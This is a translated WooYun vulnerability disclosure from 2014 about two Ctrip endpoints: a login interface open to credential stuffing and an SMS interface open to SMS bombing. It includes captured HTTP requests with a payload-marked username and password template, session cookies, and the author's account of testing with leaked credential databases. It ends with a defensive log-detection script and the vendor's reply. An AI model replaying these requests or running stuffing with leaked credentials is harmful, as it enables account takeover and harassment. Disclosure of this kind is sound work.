WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-11-11: Details reported to the vendor, awaiting vendor handling
2014-11-11: Vendor confirmed; details disclosed to the vendor only
2014-11-21: Details disclosed to core white hats and experts in the relevant field
2014-12-01: Details disclosed to regular white hats
2014-12-11: Details disclosed to intern white hats
2014-12-26: Details disclosed to the public
Interface 1: the login interface is unprotected, which allows credential stuffing, so large numbers of user passwords can be guessed. Interface 2: the SMS interface is not rate-limited, which allows SMS bombing. And one more thing I want to say: vendor, look here: $$$
BUG 1: Affected interface: https://accounts.ctrip.com/globalwap/account/login/ . Basically the WAP login pages for all the other countries authenticate through this endpoint, yet it applies no restrictions at all. Request captured while logging in:
POST /globalwap/account/login/ HTTP/1.1
Host: accounts.ctrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://accounts.ctrip.com/globalwap/account/login/
Cookie: _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1222595445370.18yv31.1.1415607878326.1415670913381.3.426; _jzqco=%7C%7C%7C%7C1415599563950%7C1.1614112599.1415595504733.1415670919253.1415671025719.1415670919253.1415671025719.0.0.0.82.82; __zpspc=9.8.1415670919.1415671025.2%231%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415611614.1415670919.2; __utmz=1.1415611614.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.10922190.1415595506; LoginStatus=1%7czfhtiysc15im2huhnfiy1jnq480123%2c; Union=AllianceID=10530&SID=333189&OUID=000401app-96; Session=SmartLinkCode=222&SmartLinkKeyWord=&SmartLinkQuary=&SmartLinkHost=&SmartLinkLanguage=zh; zdata=zdata=fbtJpBv9C0ehaHww5dt8ARz60iM=; bid=bid=F; Customer=HAL=ctrip_en; TraceSessionEx=E787F98E577C6F54D7617658F2BF7756; login_type=0; login_uid=920F895E064728DE01786; StartCity_Pkg=PkgStartCity=28; OrderCountForMyCtrip=NotravelOrderCount=0&UnSubmitOrderCount=0&WaitAllReviewCount=0&WaitReviewOrderCount=0&WaitTravelOrderCount=0; WAPACHOST=de.ctrip.com; WAPACLANG=de; WAPACBACK=; __utma=1.1094494192215595506.1415611614.1415670919.2; __utmz=1.14152.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TracingUserFlag=ab461c5bfe83ae82; TracingErrorFlag=8b15a8523781bcb8; TracingUserFlag=; M133664218=6; _abtest_userid=17f7299f-dac6-459c-bb15-31af7030162d; ticket_ctrip=uoeOwviAJ6VQEgTNwLuTqSV9j/bS+aOP3Riia12QZsD2giTsSgRspVxT9gVTWKAxJ4HkD23fApqQ3QMOE5IaeSosSdj/B3EvFJUBZysEweyWgXWo5xMG3TUgsErz5oLdCian0tw0kzvhAoK6dTc3++u1ZIAWd2eGOCM0/XmfsdolFtzXzgHfvXqOHZ54WcGrBSN2WW2cLo6BkwPpv5BLIPjgaTJ/9x8PPkNgZ/uhrs82GPpb3azYzoaTdBIbzJW6VCLWjA==; corpid=; corpname=; CtripUserInfo=VipGrade=0&UserName=%c2b%aa%ce%fb%ce%fb%22eadMessageCount=0&U=A58C63A452CFD6E6F68962A25FC; AHeadUserInfo=VipGrade=0&UserName=%c2%aa%ce%fb%ce%fb%2f&NoReadMessageCount=0&U=A22CFD6E6F68962A25FC; auto=FD846C1C8F1C7AA17FEA3A964F6A499CB9D01E6030DD50D5; TicketSiteID=SiteID=1005; _bfs=1.7; _bfi=p1%32003%26p2%3D100111%21%3D426%26v2%3D425; __utmb=1.3.10.1415670919; __utmc=1; __utmt=1; NSC_WT_Bddpvout_443=ffffffff09001c7445525d5f4f58455e445a4a423660; NSC_WT_Bddpvout_80=ffffffff09001c2045525d5f4f58455e445a4a423660; NSC_WT_bddpvout.hmpcbm_443=ffffffff09001c2b45525d5f4f58455e445a4a423660; __utmb=1.3.10.1415670919; __utmc=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

UserName=§15555555555§&Password=§111111111§
For the credential stuffing I used credential databases that had leaked onto the Internet; only a small portion of that data was used for testing, and the success rate was very high. BUG 2: the SMS interface is not rate-limited, which allows SMS bombing:
GET /card/ajax/AjaxSendCommonSms.aspx?tempid=0.6355477791943324&typeKey=Register&uid=&mp=15555555555&sendType=1 HTTP/1.1
Host: b.ctrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://b.ctrip.com/card/Register/Register3.aspx?phone=13888888888
Cookie: NSC_WT_C_80=fffddd2245525d5f4f58455e445a4a423660; ASP.NET_SessionId=5b3c5m4d0wbddddtgb3m; _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1415595445370.18yv31.1.1415dd445370.1415595445370.1.5; _bfs=1.5; _bfi=p1%3D0%26ddd5%26v2%3D4; _jzqco=%7C%7C%7C%7C%7C1.1614112599.1415dd504733.1415595504733.1415595504734.1415dd95504733.1415595504734.0.0.0.1.1; __zpspc=9.1.1415595504.1415595504.1%234%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415595506.1415595506.1; __utmb=1.2.10.1415595506; __utmc=1; __utmz=1.1415595506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; corpname=; CoCode=; CtripUserId=; corpid=; _ga=GA1.2.1094494190.1415595506; _gat=1
Connection: keep-alive
This SMS interface has no limits whatsoever...
Add a verification step to the login interface.
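As an added defender-side example (not part of the original report), the detection logic for both issues run over a constructed access-log sample: login attempts from one client spread over many distinct usernames, and repeated verification-SMS sends to one number. The log format, the thresholds and the client IPs are assumptions; the two endpoint paths and the two phone-number placeholders come from the report.

```python
import urllib.parse
from collections import defaultdict
LOGIN_PATH = "/globalwap/account/login/"
SMS_PATH = "/card/ajax/AjaxSendCommonSms.aspx"
# Constructed sample access log (not from the report): "<epoch> <client_ip> <status> <method> <target> <username|->"
SAMPLE_LOG = """\
1415670900 203.0.113.7 401 POST /globalwap/account/login/ 15555555551
1415670901 203.0.113.7 401 POST /globalwap/account/login/ 15555555552
1415670902 203.0.113.7 200 POST /globalwap/account/login/ 15555555553
1415670903 203.0.113.7 401 POST /globalwap/account/login/ 15555555554
1415670905 198.51.100.9 401 POST /globalwap/account/login/ alice
1415670910 203.0.113.7 200 GET /card/ajax/AjaxSendCommonSms.aspx?typeKey=Register&mp=15555555555&sendType=1 -
1415670911 203.0.113.7 200 GET /card/ajax/AjaxSendCommonSms.aspx?typeKey=Register&mp=15555555555&sendType=1 -
1415670912 203.0.113.7 200 GET /card/ajax/AjaxSendCommonSms.aspx?typeKey=Register&mp=15555555555&sendType=1 -
1415670960 203.0.113.7 200 GET /card/ajax/AjaxSendCommonSms.aspx?typeKey=Register&mp=13888888888&sendType=1 -
"""

def parse_line(line):
    ts, ip, _status, _method, target, user = line.split(" ", 5)
    path, _, query = target.partition("?")
    return int(ts), ip, path, dict(urllib.parse.parse_qsl(query)), user

def peak_in_window(times, window):
    # Largest number of events inside any span of `window` seconds (two-pointer sweep).
    times, lo, best = sorted(times), 0, 0
    for hi, t in enumerate(times):
        while t - times[lo] > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best

def find_credential_stuffing(log, window=60, min_attempts=4, min_users=3):
    # Stuffing sprays many *different* usernames from one client in a burst; one user retrying a password does not.
    by_ip = defaultdict(list)
    for ts, ip, path, _, user in map(parse_line, log.splitlines()):
        if path == LOGIN_PATH:
            by_ip[ip].append((ts, user))
    return {ip: len({u for _, u in evs}) for ip, evs in by_ip.items()
            if peak_in_window([t for t, _ in evs], window) >= min_attempts
            and len({u for _, u in evs}) >= min_users}

def find_sms_flooding(log, window=60, max_per_window=2):
    # Sends per target number (`mp`); a server-side limiter would key on this same counter and refuse the excess.
    by_phone = defaultdict(list)
    for ts, _, path, params, _ in map(parse_line, log.splitlines()):
        if path == SMS_PATH and "mp" in params:
            by_phone[params["mp"]].append(ts)
    return {mp: peak_in_window(times, window) for mp, times in by_phone.items()
            if peak_in_window(times, window) > max_per_window}
```

Both functions return only the offending keys (client IP, target number) with the count that tripped the threshold, so the same code can feed an alert or a blocking rule.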
Severity: Low
Vulnerability Rank: 1
Confirmed: 2014-11-11 11:53
The credential stuffing vulnerability was already submitted by another white hat on the 7th of this month, so the credential stuffing vulnerability you submitted can only be handled as ignored. The SMS bombing vulnerability has been confirmed to exist and had not been submitted by anyone before. Many thanks for your submission.
None yet